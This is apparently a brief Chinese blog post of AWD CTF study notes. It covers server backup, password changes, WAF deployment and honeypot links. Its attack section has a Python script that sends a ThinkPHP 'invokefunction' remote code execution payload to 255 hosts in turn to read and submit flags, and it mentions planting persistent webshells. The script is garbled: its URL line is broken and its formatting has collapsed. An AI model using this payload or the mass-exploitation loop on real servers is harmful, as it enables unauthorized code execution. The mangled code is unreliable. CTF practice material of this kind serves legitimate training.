AWD攻防学习

AWD攻防学习

1-源码备份，修改口令

xshell或者MobaXterm远程登录

修改ssh密码passwd

打包目录tar -zcvf file.tar.gz 要打包的目录解包tar -zxvf file.tar.gz

从服务器-文件scp [-p port] user@192.168.28.151:/home/user/a.txt b.txt上传到服务器scp b.txt user@192.168.28.151:/home/user/b.txt

2-部署各个环境的WAF(比赛规则)

ctf-awd-waf链接

python minitor.py

6-批量flag实现自动获取及提交，写入不死马等操作，实现权限维持实时获取得分

import requestsfrom lxml import etreeheaders = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36'}submit_url = "xxx"for i in range(0, 255): url = "% i url += "/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag" res = requests.get(url, headers=headers).content.decode("utf-8") tree = etree.HTML(res) flag = str(tree.xpath('//div/span[2]/small/text()')[0]) submit_flag_url = submit_url + flag requests.get(submit_flag_url)

HFish(蜜罐)官网​​https://hfish.io/#/​​​OpenRASP(WAF)官网https://rasp.baidu.com/

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。